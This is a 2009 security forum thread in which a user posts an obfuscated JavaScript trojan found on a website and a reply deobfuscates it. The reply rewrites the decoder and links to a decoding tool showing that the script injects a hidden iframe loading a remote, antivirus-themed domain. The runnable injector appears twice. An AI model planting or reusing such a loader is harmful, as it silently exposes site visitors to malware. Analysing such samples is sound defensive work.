Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
javascript trojan unrevealed
Posted by: merica
Date: May 08, 2009 03:34AM

I've stumbled upon a website and when the page was loading my antivirus found a trojan. I've managed somehow to view the page contents and I've stumbled upon this script and tried to understand how it's working but the messy functions and var names got my head spinning so here it it maybe someone here can tell what this all about.

<script>function c268fb268di4a006283449b4(i4a00628344d43){ return (parseInt(i4a00628344d43,16));}function i4a006283458f6(i4a00628345ce2){ var i4a006283460ac='';i4a0062834704f=String.fromCharCode;for(i4a006283464ab=0;i4a006283464ab<i4a00628345ce2.length;i4a006283464ab+=2){ i4a006283460ac+=(i4a0062834704f(c268fb268di4a006283449b4(i4a00628345ce2.substr(i4a006283464ab,2))));}return i4a006283460ac;} var r28='';var i4a0062834744f='3C7'+r28+'3637'+r28+'2697'+r28+'07'+r28+'43E696628216D7'+r28+'96961297'+r28+'B646F637'+r28+'56D656E7'+r28+'42E7'+r28+'7'+r28+'7'+r28+'2697'+r28+'465287'+r28+'56E657'+r28+'363617'+r28+'065282027'+r28+'2533632536392536362537'+r28+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+r28+'332537'+r28+'32253633253364253237'+r28+'2536382537'+r28+'342537'+r28+'342537'+r28+'302533612532662532662536312536652537'+r28+'342536392537'+r28+'362536392537'+r28+'322537'+r28+'352537'+r28+'332532652537'+r28+'36253633253266253366253237'+r28+'2532622534642536312537'+r28+'342536382532652537'+r28+'322536662537'+r28+'352536652536342532382534642536312537'+r28+'342536382532652537'+r28+'32253631253665253634253666253664253238253239253261253336253333253331253336253338253239253262253237'+r28+'253339253339253335253237'+r28+'2532302537'+r28+'37'+r28+'2536392536342537'+r28+'34253638253364253333253337'+r28+'253336253230253638253635253639253637'+r28+'2536382537'+r28+'342533642533312533362533382532302537'+r28+'332537'+r28+'342537'+r28+'39253663253635253364253237'+r28+'2537'+r28+'362536392537'+r28+'332536392536322536392536632536392537'+r28+'342537'+r28+'39253361253638253639253634253634253635253665253237'+r28+'2533652533632532662536392536362537'+r28+'3225363125366425363525336527'+r28+'29293B7'+r28+'D7'+r28+'6617'+r28+'2206D7'+r28+'969613D7'+r28+'47'+r28+'27'+r28+'5653B3C2F7'+r28+'3637'+r28+'2697'+r28+'07'+r28+'43E';document.write(i4a006283458f6(i4a0062834744f));</script>

Options: ReplyQuote
Re: javascript trojan unrevealed
Posted by: Gareth Heyes
Date: May 08, 2009 05:14AM

<script>
function fromHex(str) {
return parseInt(str, 16);
}


function extractPayload(payload) {
var decoded = "";
for (var i = 0; i < payload.length; i += 2) {
decoded += String.fromCharCode(fromHex(payload.substr(i, 2)));
}
return decoded;
}

var r28 = "";
var payload = "3C7" + r28 + "3637" + r28 + "2697" + r28 + "07" + r28 + "43E696628216D7" + r28 + "96961297" + r28 + "B646F637" + r28 + "56D656E7" + r28 + "42E7" + r28 + "7" + r28 + "7" + r28 + "2697" + r28 + "465287" + r28 + "56E657" + r28 + "363617" + r28 + "065282027" + r28 + "2533632536392536362537" + r28 + "322536312536642536352532302536652536312536642536352533642536332533322533362532302537" + r28 + "332537" + r28 + "32253633253364253237" + r28 + "2536382537" + r28 + "342537" + r28 + "342537" + r28 + "302533612532662532662536312536652537" + r28 + "342536392537" + r28 + "362536392537" + r28 + "322537" + r28 + "352537" + r28 + "332532652537" + r28 + "36253633253266253366253237" + r28 + "2532622534642536312537" + r28 + "342536382532652537" + r28 + "322536662537" + r28 + "352536652536342532382534642536312537" + r28 + "342536382532652537" + r28 + "32253631253665253634253666253664253238253239253261253336253333253331253336253338253239253262253237" + r28 + "253339253339253335253237" + r28 + "2532302537" + r28 + "37" + r28 + "2536392536342537" + r28 + "34253638253364253333253337" + r28 + "253336253230253638253635253639253637" + r28 + "2536382537" + r28 + "342533642533312533362533382532302537" + r28 + "332537" + r28 + "342537" + r28 + "39253663253635253364253237" + r28 + "2537" + r28 + "362536392537" + r28 + "332536392536322536392536632536392537" + r28 + "342537" + r28 + "39253361253638253639253634253634253635253665253237" + r28 + "2533652533632532662536392536362537" + r28 + "3225363125366425363525336527" + r28 + "29293B7" + r28 + "D7" + r28 + "6617" + r28 + "2206D7" + r28 + "969613D7" + r28 + "47" + r28 + "27" + r28 + "5653B3C2F7" + r28 + "3637" + r28 + "2697" + r28 + "07" + r28 + "43E";
document.write(extractPayload(payload));
</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: javascript trojan unrevealed
Posted by: Gareth Heyes
Date: May 08, 2009 05:33AM

And so the question is can Hackvertor decode it? :)

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBmcm9tY2hhcmNvZGVzXzE%2BPEBoZXgyZGVjXzAoJywnKT48QHJlcGxhY2VfMSgiLCIsIjB4LCIpPjxAZmluZF8wKC57Mn0sZ2ltKT48QHJlcGxhY2VfMjYoIlsnO10iLCk%2BPEByZXBsYWNlXzI1KCInXCtyMjhcKyciLCk%2BJzNDNycrcjI4KyczNjM3JytyMjgrJzI2OTcnK3IyOCsnMDcnK3IyOCsnNDNFNjk2NjI4MjE2RDcnK3IyOCsnOTY5NjEyOTcnK3IyOCsnQjY0NkY2MzcnK3IyOCsnNTZENjU2RTcnK3IyOCsnNDJFNycrcjI4Kyc3JytyMjgrJzcnK3IyOCsnMjY5NycrcjI4Kyc0NjUyODcnK3IyOCsnNTZFNjU3JytyMjgrJzM2MzYxNycrcjI4KycwNjUyODIwMjcnK3IyOCsnMjUzMzYzMjUzNjM5MjUzNjM2MjUzNycrcjI4KyczMjI1MzYzMTI1MzY2NDI1MzYzNTI1MzIzMDI1MzY2NTI1MzYzMTI1MzY2NDI1MzYzNTI1MzM2NDI1MzYzMzI1MzMzMjI1MzMzNjI1MzIzMDI1MzcnK3IyOCsnMzMyNTM3JytyMjgrJzMyMjUzNjMzMjUzMzY0MjUzMjM3JytyMjgrJzI1MzYzODI1MzcnK3IyOCsnMzQyNTM3JytyMjgrJzM0MjUzNycrcjI4KyczMDI1MzM2MTI1MzI2NjI1MzI2NjI1MzYzMTI1MzY2NTI1MzcnK3IyOCsnMzQyNTM2MzkyNTM3JytyMjgrJzM2MjUzNjM5MjUzNycrcjI4KyczMjI1MzcnK3IyOCsnMzUyNTM3JytyMjgrJzMzMjUzMjY1MjUzNycrcjI4KyczNjI1MzYzMzI1MzI2NjI1MzM2NjI1MzIzNycrcjI4KycyNTMyNjIyNTM0NjQyNTM2MzEyNTM3JytyMjgrJzM0MjUzNjM4MjUzMjY1MjUzNycrcjI4KyczMjI1MzY2NjI1MzcnK3IyOCsnMzUyNTM2NjUyNTM2MzQyNTMyMzgyNTM0NjQyNTM2MzEyNTM3JytyMjgrJzM0MjUzNjM4MjUzMjY1MjUzNycrcjI4KyczMjI1MzYzMTI1MzY2NTI1MzYzNDI1MzY2NjI1MzY2NDI1MzIzODI1MzIzOTI1MzI2MTI1MzMzNjI1MzMzMzI1MzMzMTI1MzMzNjI1MzMzODI1MzIzOTI1MzI2MjI1MzIzNycrcjI4KycyNTMzMzkyNTMzMzkyNTMzMzUyNTMyMzcnK3IyOCsnMjUzMjMwMjUzNycrcjI4KyczNycrcjI4KycyNTM2MzkyNTM2MzQyNTM3JytyMjgrJzM0MjUzNjM4MjUzMzY0MjUzMzMzMjUzMzM3JytyMjgrJzI1MzMzNjI1MzIzMDI1MzYzODI1MzYzNTI1MzYzOTI1MzYzNycrcjI4KycyNTM2MzgyNTM3JytyMjgrJzM0MjUzMzY0MjUzMzMxMjUzMzM2MjUzMzM4MjUzMjMwMjUzNycrcjI4KyczMzI1MzcnK3IyOCsnMzQyNTM3JytyMjgrJzM5MjUzNjYzMjUzNjM1MjUzMzY0MjUzMjM3JytyMjgrJzI1MzcnK3IyOCsnMzYyNTM2MzkyNTM3JytyMjgrJzMzMjUzNjM5MjUzNjMyMjUzNjM5MjUzNjYzMjUzNjM5MjUzNycrcjI4KyczNDI1MzcnK3IyOCsnMzkyNTMzNjEyNTM2MzgyNTM2MzkyNTM2MzQyNTM2MzQyNTM2MzUyNTM2NjUyNTMyMzcnK3IyOCsnMjUzMzY1MjUzMzYzMjUzMjY2MjUzNjM5MjUzNjM2MjUzNycrcjI4KyczMjI1MzYzMTI1MzY2NDI1MzYzNTI1MzM2NTI3JytyMjgrJzI5MjkzQjcnK3IyOCsnRDcnK3IyOCsnNjYxNycrcjI4KycyMjA2RDcnK3IyOCsnOTY5NjEzRDcnK3IyOCsnNDcnK3IyOCsnMjcnK3IyOCsnNTY1M0IzQzJGNycrcjI4KyczNjM3JytyMjgrJzI2OTcnK3IyOCsnMDcnK3IyOCsnNDNFJzs8QC9yZXBsYWNlXzI1PjxAL3JlcGxhY2VfMjY%2BPEAvZmluZF8wPjxAL3JlcGxhY2VfMT48QC9oZXgyZGVjXzA%2BPEAvZnJvbWNoYXJjb2Rlc18xPg%3D%3D

and if you're super lazy:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PHNjcmlwdD5pZighbXlpYSl7ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoICc8QGRfZW5jXzI%2BJTNjJTY5JTY2JTcyJTYxJTZkJTY1JTIwJTZlJTYxJTZkJTY1JTNkJTYzJTMyJTM2JTIwJTczJTcyJTYzJTNkJTI3JTY4JTc0JTc0JTcwJTNhJTJmJTJmJTYxJTZlJTc0JTY5JTc2JTY5JTcyJTc1JTczJTJlJTc2JTYzJTJmJTNmJTI3JTJiJTRkJTYxJTc0JTY4JTJlJTcyJTZmJTc1JTZlJTY0JTI4JTRkJTYxJTc0JTY4JTJlJTcyJTYxJTZlJTY0JTZmJTZkJTI4JTI5JTJhJTM2JTMzJTMxJTM2JTM4JTI5JTJiJTI3JTM5JTM5JTM1JTI3JTIwJTc3JTY5JTY0JTc0JTY4JTNkJTMzJTM3JTM2JTIwJTY4JTY1JTY5JTY3JTY4JTc0JTNkJTMxJTM2JTM4JTIwJTczJTc0JTc5JTZjJTY1JTNkJTI3JTc2JTY5JTczJTY5JTYyJTY5JTZjJTY5JTc0JTc5JTNhJTY4JTY5JTY0JTY0JTY1JTZlJTI3JTNlJTNjJTJmJTY5JTY2JTcyJTYxJTZkJTY1JTNlPEAvZF9lbmNfMj4nKSk7fXZhciBteWlhPXRydWU7PC9zY3JpcHQ%2B

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/08/2009 05:34AM by Gareth Heyes.

Options: ReplyQuote


Sorry, only registered users may post in this forum.